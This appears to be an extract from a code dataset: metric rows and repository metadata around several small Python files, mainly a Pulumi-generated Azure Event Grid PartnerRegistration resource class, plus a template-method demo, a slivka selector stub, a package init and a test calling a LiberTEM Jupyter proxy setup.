| 21.375 | 36 | 0.783626 | 23 | 171 | 5.826087 | 0.478261 | 0.119403 | 0.208955 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140351 | 171 | 7 | 37 | 24.428571 | 0.911565 | 0.099415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
53971f3415b6410a3e353dbb14eb4ceab3a8c1a1
| 30 |
py
|
Python
|
griddy/__init__.py
|
pgolding/pandas-grid
|
0f80db1511097656496dee503d7bb281b97b8bdc
|
[
"BSD-2-Clause"
] | 1 |
2018-01-03T11:34:08.000Z
|
2018-01-03T11:34:08.000Z
|
griddy/__init__.py
|
pgolding/pandas-grid
|
0f80db1511097656496dee503d7bb281b97b8bdc
|
[
"BSD-2-Clause"
] | null | null | null |
griddy/__init__.py
|
pgolding/pandas-grid
|
0f80db1511097656496dee503d7bb281b97b8bdc
|
[
"BSD-2-Clause"
] | null | null | null |
from .grid import render_table
| 30 | 30 | 0.866667 | 5 | 30 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 30 | 1 | 30 | 30 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
53c2457c0d1c8b05d10bdccfca2b07b59c9a6dd9
| 57 |
py
|
Python
|
scripts/selectors.py
|
bartongroup/slivka-bio
|
049aee943503963ce5c9b14267fe001edd8e0125
|
[
"Apache-2.0"
] | null | null | null |
scripts/selectors.py
|
bartongroup/slivka-bio
|
049aee943503963ce5c9b14267fe001edd8e0125
|
[
"Apache-2.0"
] | 3 |
2021-09-01T16:47:02.000Z
|
2022-02-09T09:01:31.000Z
|
scripts/selectors.py
|
bartongroup/slivka-bio
|
049aee943503963ce5c9b14267fe001edd8e0125
|
[
"Apache-2.0"
] | null | null | null |
def example_selector(*args, **kwargs):
    return "default"
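# This example selector ignores whatever arguments slivka passes it and always
# chooses the runner registered under the name "default".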
| 19 | 55 | 0.736842 | 7 | 57 | 5.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 57 | 2 | 56 | 28.5 | 0.803922 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | true | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 |
0
| 6 |
0709b6cd82b1f84edf49917175e51ec7e1ae9747
| 264 |
py
|
Python
|
practice/src/design_pattern/TemplateMethod.py
|
t10471/python
|
75056454bfb49197eb44f6b4d6a1b0a0b4b408ec
|
[
"MIT"
] | null | null | null |
practice/src/design_pattern/TemplateMethod.py
|
t10471/python
|
75056454bfb49197eb44f6b4d6a1b0a0b4b408ec
|
[
"MIT"
] | null | null | null |
practice/src/design_pattern/TemplateMethod.py
|
t10471/python
|
75056454bfb49197eb44f6b4d6a1b0a0b4b408ec
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Just plain inheritance
class Base(object):
    def __init__(self):
        pass

    def meth(self, value):
        return self._meth(value)

    def _meth(self, value):
        return value


class Pow(Base):
    def _meth(self, value):
        return pow(value, value)
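
# Illustrative usage sketch (values are arbitrary):
if __name__ == '__main__':
    print(Base().meth(3))  # 3: the default hook returns its argument unchanged
    print(Pow().meth(3))   # 27: the overridden hook computes pow(3, 3)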
| 15.529412 | 30 | 0.556818 | 36 | 264 | 3.888889 | 0.416667 | 0.15 | 0.235714 | 0.3 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005435 | 0.30303 | 264 | 16 | 31 | 16.5 | 0.755435 | 0.098485 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.1 | 0 | 0.3 | 0.9 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 |
0
| 6 |
071028fc162506887f63334754f84e376a76520e
| 31,879 |
py
|
Python
|
sdk/python/pulumi_azure_native/eventgrid/partner_registration.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/eventgrid/partner_registration.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/eventgrid/partner_registration.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
__all__ = ['PartnerRegistrationArgs', 'PartnerRegistration']
@pulumi.input_type
class PartnerRegistrationArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
authorized_azure_subscription_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
customer_service_uri: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logo_uri: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
partner_customer_service_extension: Optional[pulumi.Input[str]] = None,
partner_customer_service_number: Optional[pulumi.Input[str]] = None,
partner_name: Optional[pulumi.Input[str]] = None,
partner_registration_name: Optional[pulumi.Input[str]] = None,
partner_resource_type_description: Optional[pulumi.Input[str]] = None,
partner_resource_type_display_name: Optional[pulumi.Input[str]] = None,
partner_resource_type_name: Optional[pulumi.Input[str]] = None,
setup_uri: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
visibility_state: Optional[pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']]] = None):
"""
The set of arguments for constructing a PartnerRegistration resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group within the user's subscription.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_azure_subscription_ids: List of Azure subscription Ids that are authorized to create a partner namespace
associated with this partner registration. This is an optional property. Creating
partner namespaces is always permitted under the same Azure subscription as the one used
for creating the partner registration.
:param pulumi.Input[str] customer_service_uri: The extension of the customer service URI of the publisher.
:param pulumi.Input[str] location: Location of the resource.
:param pulumi.Input[str] logo_uri: URI of the logo.
:param pulumi.Input[str] long_description: Long description for the custom scenarios and integration to be displayed in the portal if needed.
Length of this description should not exceed 2048 characters.
:param pulumi.Input[str] partner_customer_service_extension: The extension of the customer service number of the publisher. Only digits are allowed and number of digits should not exceed 10.
:param pulumi.Input[str] partner_customer_service_number: The customer service number of the publisher. The expected phone format should start with a '+' sign
followed by the country code. The remaining digits are then followed. Only digits and spaces are allowed and its
length cannot exceed 16 digits including country code. Examples of valid phone numbers are: +1 515 123 4567 and
+966 7 5115 2471. Examples of invalid phone numbers are: +1 (515) 123-4567, 1 515 123 4567 and +966 121 5115 24 7 551 1234 43
:param pulumi.Input[str] partner_name: Official name of the partner name. For example: "Contoso".
:param pulumi.Input[str] partner_registration_name: Name of the partner registration.
:param pulumi.Input[str] partner_resource_type_description: Short description of the partner resource type. The length of this description should not exceed 256 characters.
:param pulumi.Input[str] partner_resource_type_display_name: Display name of the partner resource type.
:param pulumi.Input[str] partner_resource_type_name: Name of the partner resource type.
:param pulumi.Input[str] setup_uri: URI of the partner website that can be used by Azure customers to setup Event Grid
integration on an event source.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Tags of the resource.
:param pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']] visibility_state: Visibility state of the partner registration.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if authorized_azure_subscription_ids is not None:
pulumi.set(__self__, "authorized_azure_subscription_ids", authorized_azure_subscription_ids)
if customer_service_uri is not None:
pulumi.set(__self__, "customer_service_uri", customer_service_uri)
if location is not None:
pulumi.set(__self__, "location", location)
if logo_uri is not None:
pulumi.set(__self__, "logo_uri", logo_uri)
if long_description is not None:
pulumi.set(__self__, "long_description", long_description)
if partner_customer_service_extension is not None:
pulumi.set(__self__, "partner_customer_service_extension", partner_customer_service_extension)
if partner_customer_service_number is not None:
pulumi.set(__self__, "partner_customer_service_number", partner_customer_service_number)
if partner_name is not None:
pulumi.set(__self__, "partner_name", partner_name)
if partner_registration_name is not None:
pulumi.set(__self__, "partner_registration_name", partner_registration_name)
if partner_resource_type_description is not None:
pulumi.set(__self__, "partner_resource_type_description", partner_resource_type_description)
if partner_resource_type_display_name is not None:
pulumi.set(__self__, "partner_resource_type_display_name", partner_resource_type_display_name)
if partner_resource_type_name is not None:
pulumi.set(__self__, "partner_resource_type_name", partner_resource_type_name)
if setup_uri is not None:
pulumi.set(__self__, "setup_uri", setup_uri)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if visibility_state is not None:
pulumi.set(__self__, "visibility_state", visibility_state)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group within the user's subscription.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="authorizedAzureSubscriptionIds")
def authorized_azure_subscription_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of Azure subscription Ids that are authorized to create a partner namespace
associated with this partner registration. This is an optional property. Creating
partner namespaces is always permitted under the same Azure subscription as the one used
for creating the partner registration.
"""
return pulumi.get(self, "authorized_azure_subscription_ids")
@authorized_azure_subscription_ids.setter
def authorized_azure_subscription_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "authorized_azure_subscription_ids", value)
@property
@pulumi.getter(name="customerServiceUri")
def customer_service_uri(self) -> Optional[pulumi.Input[str]]:
"""
The extension of the customer service URI of the publisher.
"""
return pulumi.get(self, "customer_service_uri")
@customer_service_uri.setter
def customer_service_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_service_uri", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Location of the resource.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="logoUri")
def logo_uri(self) -> Optional[pulumi.Input[str]]:
"""
URI of the logo.
"""
return pulumi.get(self, "logo_uri")
@logo_uri.setter
def logo_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logo_uri", value)
@property
@pulumi.getter(name="longDescription")
def long_description(self) -> Optional[pulumi.Input[str]]:
"""
Long description for the custom scenarios and integration to be displayed in the portal if needed.
Length of this description should not exceed 2048 characters.
"""
return pulumi.get(self, "long_description")
@long_description.setter
def long_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "long_description", value)
@property
@pulumi.getter(name="partnerCustomerServiceExtension")
def partner_customer_service_extension(self) -> Optional[pulumi.Input[str]]:
"""
The extension of the customer service number of the publisher. Only digits are allowed and number of digits should not exceed 10.
"""
return pulumi.get(self, "partner_customer_service_extension")
@partner_customer_service_extension.setter
def partner_customer_service_extension(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_customer_service_extension", value)
@property
@pulumi.getter(name="partnerCustomerServiceNumber")
def partner_customer_service_number(self) -> Optional[pulumi.Input[str]]:
"""
The customer service number of the publisher. The expected phone format should start with a '+' sign
followed by the country code. The remaining digits are then followed. Only digits and spaces are allowed and its
length cannot exceed 16 digits including country code. Examples of valid phone numbers are: +1 515 123 4567 and
+966 7 5115 2471. Examples of invalid phone numbers are: +1 (515) 123-4567, 1 515 123 4567 and +966 121 5115 24 7 551 1234 43
"""
return pulumi.get(self, "partner_customer_service_number")
@partner_customer_service_number.setter
def partner_customer_service_number(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_customer_service_number", value)
@property
@pulumi.getter(name="partnerName")
def partner_name(self) -> Optional[pulumi.Input[str]]:
"""
Official name of the partner name. For example: "Contoso".
"""
return pulumi.get(self, "partner_name")
@partner_name.setter
def partner_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_name", value)
@property
@pulumi.getter(name="partnerRegistrationName")
def partner_registration_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the partner registration.
"""
return pulumi.get(self, "partner_registration_name")
@partner_registration_name.setter
def partner_registration_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_registration_name", value)
@property
@pulumi.getter(name="partnerResourceTypeDescription")
def partner_resource_type_description(self) -> Optional[pulumi.Input[str]]:
"""
Short description of the partner resource type. The length of this description should not exceed 256 characters.
"""
return pulumi.get(self, "partner_resource_type_description")
@partner_resource_type_description.setter
def partner_resource_type_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_resource_type_description", value)
@property
@pulumi.getter(name="partnerResourceTypeDisplayName")
def partner_resource_type_display_name(self) -> Optional[pulumi.Input[str]]:
"""
Display name of the partner resource type.
"""
return pulumi.get(self, "partner_resource_type_display_name")
@partner_resource_type_display_name.setter
def partner_resource_type_display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_resource_type_display_name", value)
@property
@pulumi.getter(name="partnerResourceTypeName")
def partner_resource_type_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the partner resource type.
"""
return pulumi.get(self, "partner_resource_type_name")
@partner_resource_type_name.setter
def partner_resource_type_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_resource_type_name", value)
@property
@pulumi.getter(name="setupUri")
def setup_uri(self) -> Optional[pulumi.Input[str]]:
"""
URI of the partner website that can be used by Azure customers to setup Event Grid
integration on an event source.
"""
return pulumi.get(self, "setup_uri")
@setup_uri.setter
def setup_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "setup_uri", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Tags of the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="visibilityState")
def visibility_state(self) -> Optional[pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']]]:
"""
Visibility state of the partner registration.
"""
return pulumi.get(self, "visibility_state")
@visibility_state.setter
def visibility_state(self, value: Optional[pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']]]):
pulumi.set(self, "visibility_state", value)
class PartnerRegistration(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorized_azure_subscription_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
customer_service_uri: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logo_uri: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
partner_customer_service_extension: Optional[pulumi.Input[str]] = None,
partner_customer_service_number: Optional[pulumi.Input[str]] = None,
partner_name: Optional[pulumi.Input[str]] = None,
partner_registration_name: Optional[pulumi.Input[str]] = None,
partner_resource_type_description: Optional[pulumi.Input[str]] = None,
partner_resource_type_display_name: Optional[pulumi.Input[str]] = None,
partner_resource_type_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
setup_uri: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
visibility_state: Optional[pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']]] = None,
__props__=None):
"""
Information about a partner registration.
API Version: 2020-04-01-preview.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_azure_subscription_ids: List of Azure subscription Ids that are authorized to create a partner namespace
associated with this partner registration. This is an optional property. Creating
partner namespaces is always permitted under the same Azure subscription as the one used
for creating the partner registration.
:param pulumi.Input[str] customer_service_uri: The extension of the customer service URI of the publisher.
:param pulumi.Input[str] location: Location of the resource.
:param pulumi.Input[str] logo_uri: URI of the logo.
:param pulumi.Input[str] long_description: Long description for the custom scenarios and integration to be displayed in the portal if needed.
Length of this description should not exceed 2048 characters.
:param pulumi.Input[str] partner_customer_service_extension: The extension of the customer service number of the publisher. Only digits are allowed and number of digits should not exceed 10.
:param pulumi.Input[str] partner_customer_service_number: The customer service number of the publisher. The expected phone format should start with a '+' sign
followed by the country code. The remaining digits are then followed. Only digits and spaces are allowed and its
length cannot exceed 16 digits including country code. Examples of valid phone numbers are: +1 515 123 4567 and
+966 7 5115 2471. Examples of invalid phone numbers are: +1 (515) 123-4567, 1 515 123 4567 and +966 121 5115 24 7 551 1234 43
:param pulumi.Input[str] partner_name: Official name of the partner name. For example: "Contoso".
:param pulumi.Input[str] partner_registration_name: Name of the partner registration.
:param pulumi.Input[str] partner_resource_type_description: Short description of the partner resource type. The length of this description should not exceed 256 characters.
:param pulumi.Input[str] partner_resource_type_display_name: Display name of the partner resource type.
:param pulumi.Input[str] partner_resource_type_name: Name of the partner resource type.
:param pulumi.Input[str] resource_group_name: The name of the resource group within the user's subscription.
:param pulumi.Input[str] setup_uri: URI of the partner website that can be used by Azure customers to setup Event Grid
integration on an event source.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Tags of the resource.
:param pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']] visibility_state: Visibility state of the partner registration.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PartnerRegistrationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Information about a partner registration.
API Version: 2020-04-01-preview.
:param str resource_name: The name of the resource.
:param PartnerRegistrationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PartnerRegistrationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorized_azure_subscription_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
customer_service_uri: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logo_uri: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
partner_customer_service_extension: Optional[pulumi.Input[str]] = None,
partner_customer_service_number: Optional[pulumi.Input[str]] = None,
partner_name: Optional[pulumi.Input[str]] = None,
partner_registration_name: Optional[pulumi.Input[str]] = None,
partner_resource_type_description: Optional[pulumi.Input[str]] = None,
partner_resource_type_display_name: Optional[pulumi.Input[str]] = None,
partner_resource_type_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
setup_uri: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
visibility_state: Optional[pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PartnerRegistrationArgs.__new__(PartnerRegistrationArgs)
__props__.__dict__["authorized_azure_subscription_ids"] = authorized_azure_subscription_ids
__props__.__dict__["customer_service_uri"] = customer_service_uri
__props__.__dict__["location"] = location
__props__.__dict__["logo_uri"] = logo_uri
__props__.__dict__["long_description"] = long_description
__props__.__dict__["partner_customer_service_extension"] = partner_customer_service_extension
__props__.__dict__["partner_customer_service_number"] = partner_customer_service_number
__props__.__dict__["partner_name"] = partner_name
__props__.__dict__["partner_registration_name"] = partner_registration_name
__props__.__dict__["partner_resource_type_description"] = partner_resource_type_description
__props__.__dict__["partner_resource_type_display_name"] = partner_resource_type_display_name
__props__.__dict__["partner_resource_type_name"] = partner_resource_type_name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["setup_uri"] = setup_uri
__props__.__dict__["tags"] = tags
__props__.__dict__["visibility_state"] = visibility_state
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:eventgrid:PartnerRegistration"), pulumi.Alias(type_="azure-native:eventgrid/v20200401preview:PartnerRegistration"), pulumi.Alias(type_="azure-nextgen:eventgrid/v20200401preview:PartnerRegistration"), pulumi.Alias(type_="azure-native:eventgrid/v20201015preview:PartnerRegistration"), pulumi.Alias(type_="azure-nextgen:eventgrid/v20201015preview:PartnerRegistration")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(PartnerRegistration, __self__).__init__(
'azure-native:eventgrid:PartnerRegistration',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'PartnerRegistration':
"""
Get an existing PartnerRegistration resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = PartnerRegistrationArgs.__new__(PartnerRegistrationArgs)
__props__.__dict__["authorized_azure_subscription_ids"] = None
__props__.__dict__["customer_service_uri"] = None
__props__.__dict__["location"] = None
__props__.__dict__["logo_uri"] = None
__props__.__dict__["long_description"] = None
__props__.__dict__["name"] = None
__props__.__dict__["partner_customer_service_extension"] = None
__props__.__dict__["partner_customer_service_number"] = None
__props__.__dict__["partner_name"] = None
__props__.__dict__["partner_resource_type_description"] = None
__props__.__dict__["partner_resource_type_display_name"] = None
__props__.__dict__["partner_resource_type_name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["setup_uri"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["visibility_state"] = None
return PartnerRegistration(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="authorizedAzureSubscriptionIds")
def authorized_azure_subscription_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of Azure subscription Ids that are authorized to create a partner namespace
associated with this partner registration. This is an optional property. Creating
partner namespaces is always permitted under the same Azure subscription as the one used
for creating the partner registration.
"""
return pulumi.get(self, "authorized_azure_subscription_ids")
@property
@pulumi.getter(name="customerServiceUri")
def customer_service_uri(self) -> pulumi.Output[Optional[str]]:
"""
The extension of the customer service URI of the publisher.
"""
return pulumi.get(self, "customer_service_uri")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Location of the resource.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="logoUri")
def logo_uri(self) -> pulumi.Output[Optional[str]]:
"""
URI of the logo.
"""
return pulumi.get(self, "logo_uri")
@property
@pulumi.getter(name="longDescription")
def long_description(self) -> pulumi.Output[Optional[str]]:
"""
Long description for the custom scenarios and integration to be displayed in the portal if needed.
Length of this description should not exceed 2048 characters.
"""
return pulumi.get(self, "long_description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="partnerCustomerServiceExtension")
def partner_customer_service_extension(self) -> pulumi.Output[Optional[str]]:
"""
The extension of the customer service number of the publisher. Only digits are allowed and number of digits should not exceed 10.
"""
return pulumi.get(self, "partner_customer_service_extension")
@property
@pulumi.getter(name="partnerCustomerServiceNumber")
def partner_customer_service_number(self) -> pulumi.Output[Optional[str]]:
"""
The customer service number of the publisher. The expected phone format should start with a '+' sign
followed by the country code. The remaining digits are then followed. Only digits and spaces are allowed and its
length cannot exceed 16 digits including country code. Examples of valid phone numbers are: +1 515 123 4567 and
+966 7 5115 2471. Examples of invalid phone numbers are: +1 (515) 123-4567, 1 515 123 4567 and +966 121 5115 24 7 551 1234 43
"""
return pulumi.get(self, "partner_customer_service_number")
@property
@pulumi.getter(name="partnerName")
def partner_name(self) -> pulumi.Output[Optional[str]]:
"""
Official name of the partner name. For example: "Contoso".
"""
return pulumi.get(self, "partner_name")
@property
@pulumi.getter(name="partnerResourceTypeDescription")
def partner_resource_type_description(self) -> pulumi.Output[Optional[str]]:
"""
Short description of the partner resource type. The length of this description should not exceed 256 characters.
"""
return pulumi.get(self, "partner_resource_type_description")
@property
@pulumi.getter(name="partnerResourceTypeDisplayName")
def partner_resource_type_display_name(self) -> pulumi.Output[Optional[str]]:
"""
Display name of the partner resource type.
"""
return pulumi.get(self, "partner_resource_type_display_name")
@property
@pulumi.getter(name="partnerResourceTypeName")
def partner_resource_type_name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the partner resource type.
"""
return pulumi.get(self, "partner_resource_type_name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning state of the partner registration.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="setupUri")
def setup_uri(self) -> pulumi.Output[Optional[str]]:
"""
URI of the partner website that can be used by Azure customers to setup Event Grid
integration on an event source.
"""
return pulumi.get(self, "setup_uri")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
The system metadata relating to Partner Registration resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Tags of the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Type of the resource.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="visibilityState")
def visibility_state(self) -> pulumi.Output[Optional[str]]:
"""
Visibility state of the partner registration.
"""
return pulumi.get(self, "visibility_state")
| 51.584142 | 454 | 0.685624 | 3,730 | 31,879 | 5.579088 | 0.065952 | 0.068188 | 0.071985 | 0.065545 | 0.864825 | 0.820663 | 0.763671 | 0.710812 | 0.681691 | 0.61802 | 0 | 0.014617 | 0.225258 | 31,879 | 617 | 455 | 51.667747 | 0.827962 | 0.301546 | 0 | 0.445983 | 1 | 0 | 0.160628 | 0.104837 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155125 | false | 0.00277 | 0.019391 | 0 | 0.277008 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
0732a0a35499cb2f8dd3e3317232410829321054
| 191 |
py
|
Python
|
test/test_setupcall.py
|
jhgoebbert/jupyter-libertem-proxy
|
2f966744c08c14c534030c2623fe4a3a8590dabe
|
[
"BSD-3-Clause"
] | null | null | null |
test/test_setupcall.py
|
jhgoebbert/jupyter-libertem-proxy
|
2f966744c08c14c534030c2623fe4a3a8590dabe
|
[
"BSD-3-Clause"
] | null | null | null |
test/test_setupcall.py
|
jhgoebbert/jupyter-libertem-proxy
|
2f966744c08c14c534030c2623fe4a3a8590dabe
|
[
"BSD-3-Clause"
] | null | null | null |
def test_setupcall():
    """Test the call of the setup function."""
    import jupyter_libertem_proxy as jx

    print("\nRunning test_setupcall...")
    print(jx.setup_libertem())
